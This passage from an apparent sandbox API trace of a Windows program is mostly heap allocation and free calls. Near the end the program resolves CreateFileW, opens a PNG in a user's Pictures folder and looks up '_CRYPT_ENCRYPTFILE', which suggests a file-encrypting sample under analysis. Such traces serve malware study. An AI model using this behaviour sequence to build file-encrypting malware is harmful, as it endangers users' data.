Flags=0x0, Size=0x10) returned 0x43ca898 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.601] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0093.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0093.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.602] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0093.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ewwh.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0093.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0093.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.605] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0093.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.606] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.607] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.607] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0093.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0093.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0093.610] CloseHandle (hObject=0x298) returned 1 [0093.610] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.610] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0093.610] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea366e0, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xfb8a48f0, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0xfb8a48f0, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x4807, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="EWWH.png", cAlternateFileName="")) returned 0x41ac100 [0093.610] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0093.611] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.611] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: 